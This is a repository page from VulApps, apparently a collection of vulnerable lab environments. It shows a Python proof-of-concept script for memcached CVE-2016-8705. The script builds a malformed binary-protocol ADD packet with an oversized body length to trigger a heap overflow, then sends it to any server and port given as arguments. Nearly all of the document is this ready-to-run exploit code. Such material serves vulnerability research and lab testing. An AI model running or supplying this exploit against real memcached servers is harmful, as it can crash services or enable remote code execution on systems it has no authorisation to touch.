admin/VulApps
1
0
Fork 0
mirror of https://github.com/Medicean/VulApps.git synced 2025-06-20 18:00:18 +00:00
Code Issues Packages Projects Releases Wiki Activity
VulApps/m/memcached/cve-2016-8705/poc.py
Medicean 3ed7ccbba2 (Update Vul: Memcached) 更新 Memcached 远程命令执行漏洞环境 thx @xing-xiao 
* CVE-2016-8704
* CVE-2016-8705
* CVE-2016-8706
2017-03-10 00:15:07 +08:00

32 lines
756 B
Bash
Raw Permalink Blame History

#!/usr/bin/env python
# coding:utf-8
import struct
import socket
import sys
MEMCACHED_REQUEST_MAGIC = "\x80"
OPCODE_ADD = "\x02"
key_len = struct.pack("!H", 0xfa)
extra_len = "\x08"
data_type = "\x00"
vbucket = "\x00\x00"
body_len = struct.pack("!I", 0xffffffd0)
opaque = struct.pack("!I", 0)
CAS = struct.pack("!Q", 0)
extras_flags = 0xdeadbeef
extras_expiry = struct.pack("!I", 0xe10)
body = "A" * 1024
packet = MEMCACHED_REQUEST_MAGIC + OPCODE_ADD + key_len + extra_len
packet += data_type + vbucket + body_len + opaque + CAS
packet += body
if len(sys.argv) != 3:
print "./poc_add.py <server> <port>"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], int(sys.argv[2])))
s.sendall(packet)
print s.recv(1024)
s.close()
Reference in New Issue View Git Blame Copy Permalink